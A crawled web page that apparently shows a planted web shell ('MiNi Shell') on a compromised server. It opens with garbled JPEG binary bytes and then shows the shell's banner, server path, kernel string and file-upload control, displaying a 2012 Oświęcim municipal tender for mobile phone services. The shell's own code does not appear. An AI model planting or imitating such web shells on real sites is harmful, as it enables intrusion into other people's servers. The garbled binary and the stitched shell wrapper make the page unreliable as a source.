JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121112/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121112/445462-N-2012.html

<p class="kh_header"><b>Oświęcim: 1. Świadczenie usług telekomunikacyjnych w zakresie telefonii komórkowej wraz z dostawą telefonów komórkowych - umowa ramowa</b><br>
<b>Numer ogłoszenia: 445462 - 2012; data zamieszczenia: 12.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Oświęcim , ul.Zaborska 2, 32-600 Oświęcim, woj. małopolskie, tel. 033 8429311,8429311, faks 033 8429199.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.oswiecim.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> 1. Świadczenie usług telekomunikacyjnych w zakresie telefonii komórkowej wraz z dostawą telefonów komórkowych - umowa ramowa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Świadczenie usług telekomunikacyjnych telefonii komórkowej w zakresie realizacji połączeń głosowych, przesyłania SMS-ów i MMS-ów, dostawy i aktywacji kart sim z zachowaniem dotychczasowych numerów, zgodnie z listą dostarczoną przez Zamawiającego, dostawy fabrycznie nowych telefonów komórkowych wraz z akcesoriami.
2. Zamawiający będzie realizował przedmiot zamówienia zgodnie z następującymi warunkami:
1) Zamawiający zawrze umowę ramową z jednym wykonawcą na okres 4 lat. Przedmiotem umowy ramowej będzie uregulowanie zasad zawierania umów
o świadczenie usług telekomunikacyjnych w zakresie telefonii komórkowej, warunków świadczenia usług i dostaw aparatów telefonicznych. Zamawiający udzieli zamówienia, którego przedmiot jest objęty umową ramową Wykonawcy, z którym zawarł umowę ramową, na warunkach nie mniej korzystnych niż określone w umowie ramowej, przekazując zaproszenie do negocjacji celem ustalenia istotnych postanowień, które będą wprowadzone do umowy. Zakres poszczególnych zamówień, których przedmiot objęty jest umową ramową, będzie ustalany każdorazowo przez Zamawiającego w postępowaniu o udzielenie zamówienia publicznego.
2) Na podstawie umowy ramowej Zamawiający przystąpi do zawarcia umów
o świadczenie usług telekomunikacyjnych w zakresie telefonii komórkowej wraz
z dostawą telefonów komórkowych.
Umowa o świadczenie usług telekomunikacyjnych zostanie zawarta na okres 24 miesięcy, po upływie tego okresu zawarta zostanie następna umowa o świadczenie usług telekomunikacyjnych na okres kolejnych 24 miesięcy.
Umowa o świadczenie usług telekomunikacyjnych może być rozwiązana przez Zamawiającego w każdym czasie, za miesięcznym okresem wypowiedzenia
ze skutkiem na koniec okresu rozliczeniowego, przez pisemne oświadczenie doręczone Wykonawcy.
Po 24 miesiącach trwania umowy Zamawiającemu będzie przysługiwało prawo wymiany aparatów telefonicznych po cenach promocyjnych.
3) Podczas realizacji umowy w sprawie zamówienia publicznego w żadnym przypadku ceny rozmów i abonamentów, na dzień aktywacji karty, nie mogą być wyższe
niż określone w aktualnej ofercie publicznej operatora dla klientów biznesowych.
4) Zamawiający zobowiązuje się do utrzymania co najmniej 25 aktywnych kart SIM w czasie obowiązywania umowy ramowej.
5) Maksymalna ilość użytkowanych przez Zamawiającego kart SIM nie przekroczy 60.
6) Miesięcznie Zamawiający zamierza wykorzystać ok. 5000 minut na rozmowy
do wszystkich sieci krajowych komórkowych i stacjonarnych.
7) Wysokość abonamentu telefonicznego będzie zróżnicowana, gwarantując minimalny limit minut wliczony w abonament telefoniczny, zgodnie z tabelą zamieszczoną w Specyfikacji Istotnych Warunków Zamówienia.
8) Zamawiający wymaga zachowania określonej w Specyfikacji Istotnych Warunków Zamówienia puli numeracyjnej obecnie wykorzystywanej na potrzeby telefonii komórkowej dla 44 numerów, wszystkie z sieci Orange. Wszelkie czynności wymagane do zachowania numeracji przez Zamawiającego zrealizowane zostaną przez Wykonawcę, a Zamawiający upoważni Wykonawcę w tym zakresie oraz przekaże Wykonawcy wymagane w tym celu informacje.
9) Wykonawca zapewni w ramach zaoferowanego abonamentu, bezpłatnie:
a) aktywację kart SIM
b) brak opłat za rozpoczęcie każdego połączenia,
c) naliczanie sekundowe od pierwszej sekundy wszystkich rodzajów połączeń,
d) pakiet bezpłatnych minut wymienny na bezpłatne sms,
e) wymianę karty SIM w wypadku uszkodzenia, kradzieży, utraty lub zablokowania,
f) aktywację i dezaktywację roamingu,
g) zmianę numeru telefonu jeśli korzystanie z danego numeru będzie dla Zamawiającego uciążliwe,
h) pocztę głosową,
i) przechodzenie niewykorzystanych minut na kolejne miesiące przez okres trwania umowy o świadczenie usług telekomunikacyjnych
j) możliwość blokowania połączeń na wybrane numery i grupy numerów np. audiotele, na wniosek Zamawiającego,
k) informację o stanie konta abonenckiego,
l) przekazanie Zamawiającemu, po każdym okresie rozliczeniowym, szczegółowej specyfikacji usług oraz szczegółowych wydruków połączeń,
ł) możliwość elektronicznego zarządzania kontem przez osoby upoważnione przez   Zamawiającego,
m) opiekuna technicznego i handlowego w celu zapewnienia bieżącej obsługi,
n) równą stawkę za połączenia i sms do wszystkich krajowych sieci komórkowych i stacjonarnych, bez względu na porę dnia i dzień tygodnia, przy czym Zamawiający dopuszcza inną stawkę za połączenia i sms do wszystkich krajowych sieci komórkowych i stacjonarnych dla abonamentów typu mix
3. Wymagania dotyczące aparatów telefonicznych oraz usług gwarancyjnych i serwisowych:
a) Zamawiający zastrzega sobie możliwość wyboru z aktualnej oferty publicznej Wykonawcy do 60 aparatów telefonicznych, których łączna wartość nie przekroczy kwoty 2 900, 00 zł brutto, przy każdorazowym zawieraniu umowy na świadczenie usług telekomunikacyjnych.
b) Dostawa telefonów komórkowych wraz z kartami SIM zostanie zrealizowana co najmniej 2 dni przed uruchomieniem usług. Z chwilą podpisania umowy o świadczenie usług telekomunikacyjnych oraz przekazania aparatów telefonicznych Zamawiającemu stają się one jego własnością.
c) Wykonawca winien udzielić gwarancji na dostarczone aparaty telefoniczne wraz z akcesoriami na ogólnych warunkach określonych przez producentów. Do dostarczonego towaru objętego gwarancją Wykonawca obowiązany jest załączyć wszelkie niezbędne dokumenty gwarancyjne.
d) Wadliwe telefony komórkowe dostarczone przez Wykonawcę będą reklamowane i wymienione przez Wykonawcę na nowe, wolne od wad, w terminie nie dłuższym niż 5 dni od dnia zgłoszenia wad przez Zamawiającego.
e) Wykonawca zobowiązany jest dostarczyć na czas naprawy aparat zamienny o podobnych parametrach.
f) W przypadku uszkodzenia, zagubienia lub kradzieży telefonu komórkowego w okresie obowiązywania umowy ramowej Wykonawca zobowiązany jest sprzedać do 2 szt. telefonów komórkowych w cenie promocyjnej, w ramach obowiązujących umów o świadczenie usług telekomunikacyjnych, bez obowiązku ich przedłużania, z aktualnej oferty standardowej dla firm..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 64.21.20.00-5, 32.25.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie treści art. 144 ustawy Pzp zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, za wyjątkiem przypadków określonych w rozdz. III i XVII Specyfikacji Istotnych Warunków Zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.um.oswiecim.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Oświęcim, Wydział Zamówień Publicznych, ul. Solskiego 2, pok 11, 32-600 Oświęcim..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.11.2012 godzina 11:00, miejsce: Urząd Miasta Oświęcim, ul. Zaborska 2, pok. 01, 32-600 Oświęcim..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com